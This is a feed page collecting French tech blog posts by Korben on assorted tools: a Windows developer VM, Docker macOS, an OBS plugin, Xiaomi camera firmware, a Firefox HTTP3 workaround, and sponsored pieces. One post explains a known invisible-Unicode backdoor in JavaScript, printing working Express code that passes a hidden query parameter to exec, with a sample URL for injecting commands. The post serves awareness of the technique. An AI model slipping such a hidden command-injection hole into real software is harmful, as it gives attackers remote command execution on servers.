FreshRSS

🔒
❌ À propos de FreshRSS
Il y a de nouveaux articles disponibles, cliquez pour rafraîchir la page.
Hier — 26 janvier 2022Korben

Une machine virtuelle Windows 11 pour les développeurs à télécharger gratuitement

Par Korben

Amis développeurs, saviez-vous que Microsoft proposait sur son site une machine virtuelle Windows 11 Entreprise qui vous est entièrement destinée ?

Conçue pour vous permettre de créer des applications Windows rapidement avec les derniers outils Microsoft, elle vous intègre en plus de Windows 11 avec le mode développeur activé, le SDK de Windows 10, une version récente de Visual Studio avec avec UWP (plateforme Windows universelle), le bureau .NET et Azure activés ainsi que l’extension Windows Template Studio.

Visual Studio Code est également de la partie et le sous-système pour Linux est également présent avec Ubuntu installé par défaut. Sans oublier le terminal évidemment.

Cette machine virtuelle d’environ 20 Go est disponible pour VMWare, Hyper-V, Virtualbox ou encore Parallels et c’est gratuit.

À découvrir ici.

Microsoft vous apprend à coder des jeux

Par Korben

Fortement inspiré de Scratch, Le site Make & Code de Microsoft permet à tous ceux qui le souhaitent et notamment aux enfants, de découvrir la programmation.

Le site propose ainsi des jeux mais également des vidéos et des tutoriels qui utilisent leur plateforme MakeCode permet de concevoir principalement des jeux avec des briques.

Une fois que vous serez à l’aise avec tous ces blocs, vous pourrez passez ensuite directement en Python ou en Javascript et même mettre votre code sur du vrai hardware comme le Meowbit ou d’autres machines de ce style. Il y a même des modules pour apprendre à réaliser des mods pour Minecraft. Ils sont forts 🙂

C’est vraiment très cool pour les débutants qui veulent apprendre à créer des jeux ou pour les enfants et les parents qui veulent passer un peu de temps ensemble sur une passion ou une découverte commune.

Make & Code est disponible ici.

À partir d’avant-hierKorben

La Terre en 3D avec cet outil du CNES

Par Korben

En novembre dernier, le CNES a rendu public un outil baptisé CARS pour Chaîne Automatique de Restitution Stéréoscopique. Derrière ce nom amusant, se trouve une technologie capable à partir de 2 images satellites d’un même lieu, prises depuis 2 points différents, de générer une vue 3D, c’est-à-dire avec des volumes.

Cette vue 3D est appelée un modèle numérique de surface (Digital Surface Models) ou encore DSM et permet de passer de vues satellites comme ça :

À un modèle 3D comme ceci :

Pouvoir appliquer ce genre de volume à des photos satellites permet par exemple de différencier une pelouse d’une forêt, de suivre l’apparition de nouveaux bâtiments en ville, de mesurer la hauteur de la végétation ou encore de surveiller le volume de minerais extraits de carrières à ciel ouvert.

Bref, beaucoup d’usage possible qui permet d’ajouter à de l’analyse de photos satellites, une variable de volume qui apporte énormément à la compréhension de l’image de surface.

L’outil fonctionne avec Docker et vous trouverez la doc ici.

La liste des flux Twitch 100% Infosec

Par Korben

Si vous êtes un passionné de cybersécurité et que vous cherchez à apprendre de nouvelles choses, avez-vous déjà pensé à suivre des streams en live de hackers sur Twitch ?

Ils ne sont pas si nombreux et ils sont tous référencés sur cette page. Tous ceux qui n’ont pas streamés depuis +14 jours sont retirés de la liste, ainsi vous n’aurez que du frais.

Les gens en train de streamer à l’heure où j’écris ces lignes sont également marqués comme « En ligne » avec une pastille verte et un lien vers leur chaine YouTube est également fourni.

Et si vous êtes vous-même streamer cybersécu, n’oubliez pas de vous rajouter dans le fichier streamers.csv avec une pull request sur le projet.

Reshot – Icones, dessins vectorielles et photos gratuites

Par Korben

Vous avez besoin d’illustrer un document ou un article sur votre site ? Vous cherchez des icônes et des illustrations pour votre application ?

Ne cherchez plus !

Grâce au site Reshot proposé par Envato, vous aurez accès gratuitement et sans aucun besoin de licence à plus de 40 000 icônes, 25 000 photos et 1500 illustrations vectorielles en tous genres.

Dans la même ligne que Pexels et bien d’autres, cela vous permettra d’illustrer à peu près tout ce que vous voudrez sans avoir besoin de débourser un centime.

Et les photos sont vraiment de bonne qualité. De plus, les thèmes sont suffisamment variés pour que vous y trouviez votre compte. D’ailleurs toute la liste des tags est ici.

Besoin de dessiner un schéma rapidement ? Pensez à tldraw !

Par Korben

Si vous avez besoin de faire un petit schéma propre et clair pour illustrer un article ou de la documentation dans le cadre d’un projet de développement, j’ai un super outil libre pour vous.

Cela s’appelle tldraw et ça permet de dessiner des formes géométriques de bases, de les lier, de mettre un peu de texte et surtout d’exporter ensuite tout ça au format SVG ou JSON.

Voici un rendu SVG de la chose :

IciLà basTruc

L’interface est vraiment bien pensée, surtout qu’en plus de l’interface web que vous trouverez ici, il existe également des plugins pour les éditeurs de code comme Visual Studio ou des traitements de texte comme Taio.

Et si vous êtes curieux de voir ce que réserve la suite, la prochaine version de tldraw en cours de dev est disponible ici.

Et tldraw plaira également aux développeurs puisque vous pourrez le manipuler à l’aide de son API directement depuis la console de dev du navigateur comme vous pouvez le voir sur ces tweets.

Here's another look at how it works. Everything you do in tldraw passes through this API, so if you can do it in the app, you can do it from here, too. pic.twitter.com/RCCnXHk9QL

— tldraw (@tldraw) November 27, 2021

Vraiment génial ! Un service qui vient rejoindre ma boite à outils !

Comment ajouter des données sur une carte et l’imprimer ?

Par Korben

Google Maps, c’est super génial à utiliser, mais pas forcément à imprimer. Heureusement, il existe un site qui s’appelle PDF Map Maker qui va vous permettre de générer un PDF prêt à imprimer à partir de Google Maps.

Vous choisissez l’emplacement, le format de la page (portrait, paysage…etc.), le fond de carte dont vous avez besoin (trafic routier, satellite, plan…etc.), mais également le niveau de zoom, le style 3D ou non, la rotation et surtout un pitch pour avoir une carte sous un angle diffèrent de celui de la vue supérieure du satellite.

Une fois que vous avez ce que vous voulez, vous cliquez sur Download Map et vous récupérez un beau PDF que vous pourrez ensuite imprimer ou envoyer.

Ce qui est vraiment cool avec ce service, c’est que vous pouvez y ajouter vos propres données géographiques en les important au format JSON. Pour générer ce genre de fichiers, rendez-vous sur Vector.

Pratique pour fournir une carte à des invités, décider de l’emplacement de vos pièges à loups ou organiser une chasse au trésor dans les rues de votre ville.

Comment se passer de fond vert avec OBS ? – Plugin de fond virtuel

Par Korben

Vous voyez cette fonctionnalité sur Zoom ou Google Meet qui permet de vous détourer du fond pour ensuite afficher ce que vous voulez derrière, même sans fond vert ?

Et bien le plugin Virtual Background permet de faire la même chose sous OBS Windows 64 bit (uniquement).

Fond virtuel oblige, le détourage sera bien sûr un peu dégueu, mais vous n’aurez pas à investir dans un fond vert.

Ainsi, vous pourrez passer de ça :

À ça :

Elle n’est pas belle la vie ?

Par contre, attention, il peut y avoir des glitchs donc si VRAIMENT vous ne voulez pas que votre public puisse voir ce qu’il y a derrière vous, il ne vaudrait mieux pas utiliser ce plugin et investir dans un vrai fond vert. Je vous recommande celui-ci que j’utilise et qui est très bien.

Yi Hack – Pour débrider les caméras Xiaomi et profiter gratuitement du RTSP

Par Korben

Je vous parlais de caméra de chasse hier mais si vous avez des caméras à la maison, vous vous êtes sûrement rendu compte que la plupart étaient limitées par l’usage de l’application cliente fournie avec. Si vous utilisez des outils pour agréger des flux vidéos, vous l’avez dans l’os, car ces caméras ne propose pas en général de flux RTSP.

C’est naze.

Heureusement, pour les caméras Yi de la marque Xiaomi, il y a moyen de contourner cette limitation.

Comment ?

Et bien avec ce firmware alternatif nommé Yi Hack v5 qui permet de flasher les caméras utilisant le chipset Hi3518ev200 pour leur permettre d’avoir du RTSP, de la détection de mouvement MQTT, un webserveur / SSH / Telnet / FTP intégré et accessible et surtout la possibilité de modifier certains paramètres de la caméra :

  • caméra on/off
  • mode économie
  • sensibilité de détection
  • voyant d’état voyant
  • infrarouge
  • rotation de l’image

Voici pour votre information la liste des caméras supportées pour ce hack :

  • Yi 1080p Home 48US – confirmé
  • Yi 1080p Home 20US – confirmé
  • Yi Home 17CN / 27US / 47US – confirmé
  • Yi Dome – confirmé, mais de gros problèmes de performance avec Snapshot et ONVIF surchargent le CPU.
  • Yi 1080p Dome – confirmé
  • Yi 1080p Cloud Dome – confirmé
  • Yi 1080p Outdoor – confirmé

Évidemment comme toujours avec ce genre de firmware, il existe un risque de bricker votre appareil, mais rassurez-vous dans la plupart des cas c’est rattrapable. Je vous invite quand même à lire sérieusement la documentation pour savoir où vous mettez les pieds.

Transformez votre Raspberry Pi Zero W en caméra de chasse pour filmer la faune sauvage

Par Korben

J’ai acheté une caméra de chasse y’a pas longtemps et j’ai vachement été déçu. Le rendu est pas ouf et elle ne se déclenche pas forcément lorsqu’il y a des choses intéressantes.

Heureusement, j’ai découvert qu’on pouvait faire mieux avec un simple Raspberry Pi et le projet Sentry Picam.

Sentry-Picam est un soft pour Raspberry Pi Zero W qui permet de le transformer en caméra dédiée à la faune sauvage. Ainsi, vous pourrez capturer en vidéo H.264 1080p / 30fps le moindre mouvement animalier ou humain.

Vous pourrez ensuite revoir les clips vidéos via une interface web et ainsi identifier les moments de passage les plus actifs de la journée. Tous les enregistrements sont conservés sur la carte mémoire tant que l’espace disponible est suffisant.

Pour fonctionner, la détection de mouvement dans Sentry-Picam utilise des vecteurs fournis par le pipeline vidéo de RaspiVid, permettant une suppression performante et efficace du bruit qu’on peut retrouver dans ce genre de vidéo filmée en pleine nature avec des conditions de luminosité qui évoluent vite.

Cui-Cui, je suis cuit

Et si vous êtes plutôt amateur de directs, grâce à Broadway et RaspiVid, le Pi Zero W peut également diffuser des vidéos en live vers plusieurs appareils avec un délai d’environ 300 millisecondes sur une connexion wifi classique.

Si ce projet vous intéresse, il est sur Github.

Les Linuxiens vont enfin savoir se servir de leurs doigts

Par Korben

Si vous êtes sous Linux et que vous utilisez un touchpad, vous vous sentez peut-être un peu limité dans vos mouvements. Heureusement, grâce à l’application Touchégg, vous allez pouvoir vous la jouer comme sous macOS et transformer vos gestes gracieux en actions sur votre bureau Linux.

Que ce soit sur un pavé tactile (touchpad) ou sur un écran tactile, vous pourrez par exemple configurer Touchégg pour agrandir une fenêtre en glissant vers le haut 3 de vos doigts ou encore passer au bureau suivant en glissant vers la gauche 4 doigts.

Touchégg s’installe sous Ubuntu, Debian, Fedora, CentOS, Red Hat, Arch, Manjaro ou encore Alpine Linux.

Pour Ubuntu, il suffit d’ajouter le dépôt :

sudo add-apt-repository ppa:touchegg/stable 
sudo apt update 
sudo apt install touchegg

Évidemment, ce ne sont que des exemples et tout est parfaitement configurable, le plus simplement du monde et Touchégg peut se comporter différemment en fonction des applications.

Bref, un super logiciel qui changera votre vie si vous utilisez un Touchpad. Perso, je préfère quand même une bonne vieille souris verticale.

Que faire du compte Instagram d’un(e) proche décédé(e) ?

Par Korben

Il arrive parfois qu’on meurt. C’est con mais c’est comme ça. Et on se retrouve bien embêté surtout lorsque le défunt possède un compte Instagram.

Si vous ne vous occupez pas de son compte, celui-ci laissé à l’abandon sera sûrement supprimé ou réattribué un jour.

Heureusement, pour remédier à cela, chez Instagram, ils ont une procédure qui s’appelle la « Mémorialisation ». C’est à dire pouvoir transformer un compte Instagram en compte commémoratif pour la personne disparue.

Cela permet de se souvenir de la vie d’une personne après son décès. L’idée de ce compte commémoratif est donc de figer le compte Instagram. Ainsi, plus personne ne pourra s’y connecter et le compte sera marqué comme « Remembering » à côté du nom de la personne. Tout le contenu restera alors accessible mais ne pourra plus jamais être modifié.

Pour toujours… enfin, jusqu’à la disparition d’Instagram quoi.

Si vous avez besoin de suivre cette procédure, vous devrez remplir ce formulaire et fournir une preuve du décès.

Indexez et organisez vos captures écrans sous Android avec Firefox ScreenshotGo

Par Korben

Je fais tout le temps des tas de captures écrans de trucs dont je veux me souvenir. Mais évidemment, retrouver une capture écran parmi des centaines de captures écrans, ce n’est pas simple. C’est même parfois mission impossible.

Toutefois, Mozilla semble avoir réfléchit fortement à la question et propose Firefox ScreenshotGo, une application Android qui vous permet de faire des captures écrans mais surtout de les organiser facilement dans des collections. L’intérêt de ScreenshotGo c’est qu’il indexe également le texte présent sur les images pour pouvoir retrouver plus facilement vos captures à l’aide du moteur de recherche.

C’est donc un super outil pour les gens qui prennent beaucoup de captures écran. C’est disponible uniquement sur le Play Store Indonésien mais vous pouvez quand même l’installer en passant par ce lien.

Ce que veulent les développeurs ? – Les résultats de l’enquête

Par Korben

— En partenariat avec Sogilis —

Hello,

Alors je ne sais pas si vous vous souvenez, mais en fin d’année dernière j’ai partagé une enquête menée par Sogilis qui posait une question très intéressante : Que veulent les développeurs ?

L’idée c’était de comprendre quelles étaient les motivations des développeurs de rejoindre une entreprise. On parle en effet, beaucoup du salaire, parfois du « projet », mais il n’y a pas que ça.

Aujourd’hui, nous avons enfin les réponses puisque vous êtes exactement 1224 développeurs et développeuses à avoir répondu à l’enquête. Les femmes sont légèrement sous-représentées par rapport à la réalité, ou alors elles n’ont pas souhaité répondre à la question (environ 20% n’ont pas répondu à cette question).

La majorité d’entre vous travaille actuellement chez des éditeurs de logiciels ainsi que des ESN (entreprises de service numérique) et des agences web.

Vous avez en moyenne 33,7 ans (plus jeune que moi dites donc :-))

Et sans surprise, vous êtes localisés majoritairement à Paris et région parisienne. 56% des personnes qui ont répondu travaillent dans les 10 départements suivants :

  • Paris
  • Rhône
  • Hauts-de-Seine
  • Isère
  • Loire-Atlantique
  • Haute-Garonne
  • Nord
  • Ille-et-Vilaine
  • Gironde
  • Bouches-du-Rhône

Bon, ça, c’était pour vous décrire… Maintenant, passons dans le vif du sujet, à savoir ce que vous voulez vraiment. Au risque de vous surprendre, le salaire n’arrive pas dans le top 10 de vos critères de choix avant de rejoindre une entreprise. C’est fou. En effet, vous placez le télétravail en premier suivi par un fort besoin d’avoir une bonne ambiance au travail et la liberté sur la pose de vos congés.

D’ailleurs, les aspects purement matériels comme le salaire, le choix du matériel ou la localisation proche des transports en commun ne sont pas votre priorité. Non, ce que vous voulez c’est surtout un job dans lequel vous pouvez exprimer votre potentiel sur des projets qui ont du sens, dans une bonne ambiance et de la souplesse sur vos horaires. Bref, la qualité de vie avant la paye.

Quand on vous questionne sur votre emploi actuel, vous en êtes moyennement satisfait.

Concernant votre salaire, que vous débutiez votre carrière ou que vous ayez déjà des dizaines d’années d’expérience, vous pensez que votre travail mérite plus. En gris, c’est votre salaire actuel par année d’expérience et en rouge, c’est le salaire que vous souhaiteriez. L’augmentation est à l’évidence plus rapide en début de carrière et ensuite, ça a tendance à s’aplatir. Il n’y a pas beaucoup d’écart entre le salaire de quelqu’un qui a +10 ans d’expérience et celui de quelqu’un qui a +20 ans d’expérience.

Les salaires en région sont également beaucoup plus bas qu’en Île-de-France.

Vous le savez, les entreprises recrutent énormément de développeurs, et comme la plupart sont déjà en poste, c’est difficile de leur faire changer d’entreprise. Vous êtes d’ailleurs 39% à être suffisamment satisfaits de votre emploi actuel pour ne pas vouloir en changer. Concernant ceux qui veulent changer de job, vous êtes surtout freiné par la peur d’avoir les mêmes soucis ailleurs, ou par attachement à votre entreprise. Vous savez également que changer d’entreprise ça demande un peu de boulot et vous avez la flemme… Oui oui…

Alors pour vous motiver, qu’est-ce qui vous déciderait à changer d’entreprise en ce moment ?

Étrangement, un meilleur salaire est ce qui vient en premier. Pourtant, cela n’est pas dans le top 10 de vos critères de choix. On peut sûrement expliquer cela de plusieurs manières, mais c’est certain que le salaire est encore le critère numéro 1 pour vous motiver à changer d’entreprise. Viennent ensuite l’environnement et un fort besoin de temps libre. Vous êtes également nombreux à vouloir plus de sens à votre travail et à chercher un poste 100% en télétravail.

Concernant les ESN, Sogilis souhaitait connaître vos préjugés sur ces entreprises de service numérique. Et sans surprise, on retrouve les grands clichés suivants :

Même si ces clichés sont malheureusement vérifiables dans certaines grosses entreprises, Sogilis a toujours privilégié l’humain. Dans cette ESN régionale à taille humaine localisée à Grenoble et à Lyon, chacun décidait déjà de son rythme de télétravail, même avant le COVID. La transparence, la confiance, l’autonomie, la responsabilité et l’amélioration continue sont d’ailleurs des valeurs fortes de Sogilis.

Au niveau de la pose des congés, chacun s’organise avec son équipe et son client et le dirigeant valide systématiquement les demandes de congés (même deux jours avant). Évidemment, pour leurs clients, ils visent un travail de qualité et chacun peut démarrer sa journée quand il veut et finir quand il veut tant que cela ne nuit pas au projet.

Concernant le cliché des avant-ventes qui sont réalisées uniquement par des commerciaux déconnectés de la technique, c’est également faux chez Sogilis qui mobile toujours un représentant de chaque métier (dev, ux, ui) en avant-vente, avec le commercial (qui d’ailleurs ne touche pas de prime. Ils doivent simplement trouver des missions dans la cible qui répondent aux envies de développeurs). Ainsi, c’est l’équipe technique qui propose une démarche.

Leur démarche est donc clairement basée sur l’écoute et l’épanouissement des équipes. À tout moment, chacun peut demander à changer de mission, se tester sur un nouveau rôle dans un projet, ou encore se former.

Alors bien sûr, vous n’êtes pas obligé de les croire, mais si vous en avez l’occasion, je vous invite à échanger avec des employés de Sogilis. Vous serez surpris.

Voilà, on sait enfin ce que veulent les développeurs. Rien de vraiment bien compliqué. Une bonne ambiance, du télétravail, des projets sains et enrichissants, de la liberté, de l’autonomie…etc. Bref, un emploi qui reste un plaisir et pas une contrainte. Un endroit où ils sont considérés et écoutés et où ils peuvent évoluer et faire de leur mieux. Je ne sais pas vous, mais je trouve ça plutôt sain comme résultat d’enquête.

Reste maintenant aux entreprises qui recrutent à évoluer suffisamment pour permettre justement à chacun de vivre mieux au travail et non plus de travailler pour vivre uniquement en dehors de l’entreprise.

Firefox en panne – Comment régler le soucis ?

Par Korben

Une panne semble actuellement toucher tous les utilisateurs de Firefox. Impossible d’accèder au moindre site web.

Le problème semble lié au support du HTTP3 dans le navigateur. On ne sait pas encore exactement ce qu’a foutu Mozilla mais si vous rencontrez actuellement le problème, voici un moyen de le résoudre.

Edit2 : Le souci semble avoir été résolu par Mozilla.

Edit1 : Un ticket viens d’être créé sur sur Bugzilla. Il semblerait que ce soit lié à la collecte de données. Pour la désactiver :

Tapez dans la barre d’URL :

about:preferences

ou allez dans les préférences -> Vie privée et sécurité et désactivez la collecte de données :

Sinon, autre moyen de contournement :

Tapez dans la barre d’URL

about:config

Cliquez sur le bouton bleu d’avertissement, puis recherchez la clé

network.http.http3.enabled

Passez la à « False » en double cliquant dessus.

Ensuite relancez votre navigateur.

Bon courage. J’éditerai cet article lorsqu’on pourra tous réactiver HTTP3.

AppFlowy – Le clone libre de Notion

Par Korben

Vous connaissez forcement Notion puisque je vous en parle depuis 2 ans. J’ai même fait une vidéo qui vous explique comme l’utiliser.

Bon c’est cool mais vous le savez, Notion reste un logiciel propriétaire. Si vous ne jurez que par le logiciel libre, sachez qu’il existe une alternative libre et open source à Notion baptisée AppFlowy.

Dispo sous Windows, Linux et macOS, AppFlowy est pour le moment encore très jeune donc vous ne vous y retrouverez pas si vous êtes un utilisateur avancé de Notion. Toutefois, pour une utilisation basique, c’est tout pareil et vous pourrez designer votre documentation, vos tableaux kanban, vos grilles de contenus…etc.

Évidemment, l’intérêt avec AppFlowy, c’est que vous restez maître à 100% de vos données et que vous pouvez customiser comme bon vous semble ce clone de Notion pour en faire une tout autre application.

Créez un environnement sonore parfait pour travailler ou vous détendre

Par Korben

J’ai depuis toujours vachement de mal à me concentrer sur un truc précis. Heureusement, même si la musique ne m’aide pas vraiment, les bruits blancs et autres sons de la nature, peuvent me faciliter la tâche.

Que ce soit pour mettre une ambiance relaxante ou m’aider à me concentrer, la pluie qui tombe, le bruit des vagues, les oiseaux qui chantent ou tout simplement le vent font parfaitement l’affaire.

Avec le site shhh noise, il est possible de se créer une petite ambiance relax comme ça en cliquant simplement sur les sons que vous aimez et de régler leur volume.

Et voilà, vous êtes à la plage en plein mois de janvier. Quel bonheur !

Vous pouvez évidemment sauvegarder votre paramétrage et le partager avec vos amis ou collègues via une simple URL.

Merci à Laurent pour le partage !

Exécuter macOS dans Docker avec des performances quasi-natives

Par Korben

Que vous soyez sous Linux ou Windows, il est parfaitement possible de faire tourner macOS grâce à Docker.

Comment ?

Et bien grâce à ce projet de la boite de sécu Sick Codes qui vous fournit tout… Les images Docker pour Monterey, Big Sur, Catalina…etc ainsi que les lignes de commande qui vont bien pour lancer ces images.

Une fois Docker installé, vous pouvez récupérer les images ici sur le hub de docker puis par exemple lancer la commande suivante pour lancer Monterey :

docker run -it \
--device /dev/kvm \
-p 50922:10022 \
-v /tmp/.X11-unix:/tmp/.X11-unix \
-e "DISPLAY=${DISPLAY:-:0.0}" \
-e GENERATE_UNIQUE=true \
-e MASTER_PLIST_URL='https://raw.githubusercontent.com/sickcodes/osx-serial-generator/master/config-custom.plist' \
sickcodes/docker-osx:monterey

# docker build -t docker-osx --build-arg SHORTNAME=monterey .

Les performances sont excellentes, et vous pourrez l’utiliser pour faire de la recherche en cybersécurité (la connexion avec l’iPhone fonctionnera ainsi que iMessage, le forwarding X11 ou encore le partage de dossiers) ou tout simplement tester un outil ou deux.

Prévoyez quand même +20 GB de disque dur pour stocker la bête.

Sick Codes a également mis en ligne un optimiseur de macOS pour accélérer un peu l’exécution de celui-ci (à utiliser avec prudence)

Un tuto pour créer un bâton temporel comme dans la série Loki

Par Korben

J’ai beaucoup aimé la série Loki sur Disney+ et si vous ne l’avez pas vu, je vous la recommande.

Dans la série, les gardiens du TVA (Tribunal des Variations Anachroniques) ont un genre de sceptre qui leur permet de désintégrer les anomalies temporelles (Le Time Stick)… C’est-à-dire les gens qui se baladent dans des réalités alternatives à celle à laquelle ils appartiennent.

Très cool ce petit sceptre. Ça m’aurait bien servi ce weekend pour désintégrer quelques relous. Mais en attendant, je vais me consoler avec ce projet de sceptre imprimé en 3D qui détecte les mouvements et fait du son comme dans le film. Ainsi, si vous bossez sur un cosplay de Loki ou d’un des personnages de la série, c’est forcément le truc à avoir.

Le tuto a été mis au point par les frères Ruiz, et toutes les étapes sont décrites ici, avec également le code Python qui va bien. Le montage utilise un Feather M4 et PropMaker FeatherWing programmé avec le langage CircuitPython.

Je trouve le rendu super propre ! On dirait un vrai, même si malheureusement, on ne peut désintégrer personne avec celui-là. Cependant, je suis sûr qu’on peut y ajouter un petit taser.

Créer un timelapse d’images satellites

Par Korben

Vous vous passionnez pour les images satellites et vous aimeriez bien faire un timelapse d’une zone particulière de la planète pour montrer son évolution ?

Et bien avec Streamlit c’est possible. Le principe est simple. Vous sélectionnez une zone sur la carte, vous exportez cette zone dans un fichier json. Vous réimportez ensuite ce json, vous choisissez une collection d’images satellites et vous cliquez sur le bouton « Submit ».

Et voilà, vous aurez un joli GIF animé ou MP4 à télécharger. Je vous laisse regarder les vidéos pour voir ce que ça donne.

Une backdoor invisible en JavaScript

Par Korben

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,\u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

Dans le même genre, il est également possible de tromper l’auditeur d’un code avec des caractères qui se ressemblent. Par exemple, ce symbole “ǃ” n’est pas un point d’exclamation, mais un caractère Unicode appelé ALVEOLAR CLICK. Vous retrouverez l’ensemble de ces codes baptisés « Confusables » ici.

Vous trouverez tous les détails concernant cette technique ici.

Si vous rencontrez l’erreur « ssl.SSLCertVerificationError – certificate verify failed: unable to get local issuer certificate » avec Python

Par Korben

Voici une petite erreur que j’ai rencontrée dernièrement sous macOS au moment de lancer un script Python développé par mes soins.

ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1129)

Je me suis bien sûr demandé d’où ça venait, car je n’avais pas modifié mon code. Peut-être une mise à jour de Python. Quoiqu’il en soit, j’ai trouvé la solution, donc je la partage ici en espérant que ça serve à certains. En tout cas, je le note pour moi, histoire que la prochaine fois je perde moins de temps.

Donc si vous rencontrez cette erreur, rendez vous dans le dossier des /Applications de macOS. Localisez le répertoire Python et ouvrez-le.

À l’intérieur, vous verrez un script baptisé « Install Certificates.command ». Il vous suffit alors de double cliquer dessus pour que celui-ci s’exécute et mettre à jour les certificats SSL nécessaires à Python.

Oui, c’est aussi simple que ça.

Test de la station de charge et des panneaux solaires de chez Bluetti

Par Korben

panneaux solaires Bluetti

— Article en partenariat avec Bluetti —

Salut les amis, j’espère que ce début d’année commence bien pour vous et que vous profitez bien des cadeaux que vous avez trouvés au pied du sapin ! De mon côté j’ai pu profiter d’un gros colis envoyé par la société Bluetti : des panneaux solaires et une station de charge ! Autant vous dire que le survivaliste qui dort en moi a frétillé comme un œuf dans sa poêle.

Qui est Bluetti ?

Pour ceux qui ne savent pas vraiment ce que propose la société, je vous fais un petit topo rapide. L’idée de la boite c’est de proposer des sources d’électricité portable et simple à mettre en place ainsi qu’à utiliser. Du panneau solaire mobile pour vous dépanner dans toutes les situations et vous offrir plus de liberté, sans être dépendant d’aucun réseau. Le tout avec un niveau de maintenance très faible (rien à démonter ou à entretenir). De quoi intéresser tous ceux qui veulent vivre en ermite autonomie.

Le petit plus de la société c’est qu’elle développe entièrement tout son matériel, de la carte mère aux contrôleurs, des coques en passant par les onduleurs, etc. Tout est fait maison, ce ne sont pas des composants en marque blanche venus de l’on ne sait où et avec des garanties de fiabilité aléatoires. Pour la petite histoire, tout a démarré il y a quelques années via une campagne de crowdfunding.

OK, maintenant que c’est fait, passons à la présentation de ce qu’ils m’ont envoyé.

Les panneaux solaires : Bluetti SP200 200W

Premier constat lorsque j’ai pris la chose en main : c’est plutôt compact et léger (quelques kg). Cela se présente un peu comme un tapis de gymnastique pliant (environs 2m20 sur 50 cm de haut) qu’il suffit de déplier pour utiliser. Vous avez également des supports qui permettent de soutenir les 4 panneaux indépendamment les uns des autres, il est donc possible d’avoir différentes inclinaisons pour chacun (ce qui serait plus efficace).

Pour ce qui concerne l’aspect technique, Bluetti annonce une puissance de sortie à 95% et une puissance de 200 watts et un rendement des cellules de 23% (cellules en silicium monocristallin). Difficile de vérifier ces éléments sans matériel adéquat (ce que je n’ai pas).

Évidemment les panneaux sont fabriqués en matériaux durables, résistent à la pluie (traitement anticorrosion), mais aussi aux déchirures et autres rayures. Un connecteur et un câble MC4 sont livrés avec et il est possible de connecter plusieurs panneaux en série si vous avez besoin de plus de puissance.

Temps de mise en place : 3 minutes max, fingers in the nose.

La station de charge : Bluetti AC50S

Il suffit de raccorder le câble des panneaux à la station de charge Bluetti AC50S et d’appuyer sur un bouton pour qu’il commence à charger. Effectuer une charge complète prend environ 6 heures selon l’ensoleillement, l’heure de la journée, etc. (peut-être moins en été lorsque le soleil tape plus fort ? Je vous dirai ça dans quelques mois).

Avec ses batteries 500Wh au lithium, son onduleur 300w et sa dizaine de prises (2 AC 220-240v, 2 DC 12v/3A, 4 USB A, 1 USB C … plus un adaptateur) il permet de connecter plusieurs appareils à la fois. Il y a même un chargeur sans fil sur le dessus (pour le smartphone). Il dispose aussi d’un petit écran LCD qui permet de voir l’état de la charge et d’une lampe LED intégrée pour ne pas vous perdre dans le noir.

Comme vous le voyez sur la photo vous pouvez le déplacer très facilement via les poignées, et pour la taille c’est sensiblement la même qu’une grosse radio de notre jeunesse (la vôtre, moi j’ai toujours 18 ans) en un peu plus lourd. Niveau couleur, il existe en bleu et en orange.

Niveau sécurité, si le générateur passe en mode surcharge le groupe électrogène se met directement en protection (fonction SOS), aucun risque de voir votre abri de jardin propulsé dans l’espace en cas d’explosion 😉 L’appareil dispose également d’un système de refroidissement interne (ventilateurs sur les côtés).

Ce que j’ai aussi trouvé assez sympa c’est le peu de bruit que produit l’appareil, c’est discret donc en intérieur ça passe. À noter aussi que la station se recharge non seulement via panneaux solaires, mais aussi depuis une prise de courant classique ou l’allume-cigare de la voiture (les câbles sont fournis, c’est toujours sympa). Bluetti annonce un cycle de vie de plus de 1000 charges.

Niveau des prix le combo reçu tourne autour des 1000 €. Toutefois pour ceux qui veulent, voici un code promo qui vous donne le droit à 100 euros de réduction jusqu’au 31/01/2022 : LUOHUA2 à utiliser sur la boutique Bluetti.

Il y a des solutions moins chères (panneaux solaires 120W au lieu de 200w par exemple) et surtout beaucoup plus chères si vous vous tournez vers des solutions plus puissantes, tout en 1 avec écran tactile, à multiples panneaux solaires, etc.

Que peut-on faire avec un tel système ?

Vous pouvez bien entendu recharger ou utiliser tous vos appareils :

  • smartphone, laptop
  • drone, appareil photo, routeur
  • tout appareil disposant d’un port USB
  • enceintes, ventilateur
